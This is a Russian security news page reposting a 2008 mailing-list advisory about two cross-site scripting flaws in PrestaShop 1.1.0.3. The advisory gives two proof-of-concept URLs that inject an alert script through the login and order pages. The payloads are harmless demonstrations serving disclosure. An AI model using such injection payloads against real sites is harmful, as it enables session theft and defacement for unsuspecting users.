Информационная безопасность
[RU] switch to English


Дополнительная информация

  Ежедневная сводка уязвимостей безопасности в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

  Эксплоит для эксплуатации уязвимости EZSA-2008-003 с активацией учетной записи

  [DSECRG-08-041] Stored XSS Vulnerability in Xoops 2.3.x

  [DSECRG-08-040] Multiple Local File Include Vulnerabilities in Xoops 2.3.x

  [DSECRG-08-040] Multiple Local File Include Vulnerabilities in Xoops 2.3.x

From:th3.r00k_(at)_gmail.com <th3.r00k_(at)_gmail.com>
Date:10 декабря 2008 г.
Subject:Two XSS Flaws in PrestaShop 1.1.0.3

Affects PrestaShop 1.1.0.3
product: homepage: http://prestashop.com

This is XSS in the URI of PrestaShop.  Trust no one,  not even your $_SERVER[PHP_SELF] .

http://10.1.1.155/prestashop_1.1.0.3/admin/login.php/%22%3Cscript%3Ea
lert
(1)%3C/script%3E

Add an item to the shoping cart and then vist this url:
http://10.1.1.155/Audit/Commerce/prestashop_1.1.0.3/order.php/%22%3Cscrip
t%3Ealert
(1)%3C/script%3E

Peace

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород